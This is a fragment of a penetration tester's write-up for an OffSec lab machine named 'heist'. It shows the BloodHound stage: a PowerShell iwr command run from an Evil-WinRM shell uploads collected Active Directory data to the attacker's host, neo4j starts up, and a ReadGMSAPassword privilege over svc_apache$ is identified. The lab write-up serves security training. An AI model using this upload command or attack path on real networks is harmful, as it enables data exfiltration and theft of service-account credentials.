BloodHound
BloodHound
Ingestion
*Evil-WinRM* PS C:\tmp> iwr -Uri http://192.168.45.176:2222/ -Method POST -InFile .\heist.offsec_20250707081211_BloodHound.zip
Ingestion has already been made via adPEAS
Preps
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/heist/bloodhound]
└─$ neo4j_kickstart
[sudo] password for kali:
2025-07-07 15:38:38.903+0000 INFO Starting...
2025-07-07 15:38:39.373+0000 INFO This instance is ServerId{823c0986} (823c0986-8860-45ad-af0e-a0f1316bef16)
2025-07-07 15:38:40.428+0000 INFO ======== Neo4j 4.4.26 ========
2025-07-07 15:38:41.393+0000 INFO Performing postInitialization step for component 'security-users' with version 3 and status CURRENT
2025-07-07 15:38:41.393+0000 INFO Updating the initial password in component 'security-users'
2025-07-07 15:38:42.866+0000 INFO Bolt enabled on localhost:7687.
2025-07-07 15:38:43.598+0000 INFO Remote interface available at http://localhost:7474/
2025-07-07 15:38:43.603+0000 INFO id: F22BE6505A50EE3B6AE80482B39DD2B6A7082E68C916A87DF6F1CD7ECA4DD942
2025-07-07 15:38:43.603+0000 INFO name: system
2025-07-07 15:38:43.603+0000 INFO creationDate: 2024-09-01T10:39:20.089Z
2025-07-07 15:38:43.604+0000 INFO Started.
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/heist/bloodhound]
└─$ bloodhound-legacy
Starting neo4j and bloodhound
Ingested data uploaded
Domain
enox
User
The transitive ReadGMSAPassword privilege over the
svc_apache$
account.
This has already been enumerated.
svc_apache$
Account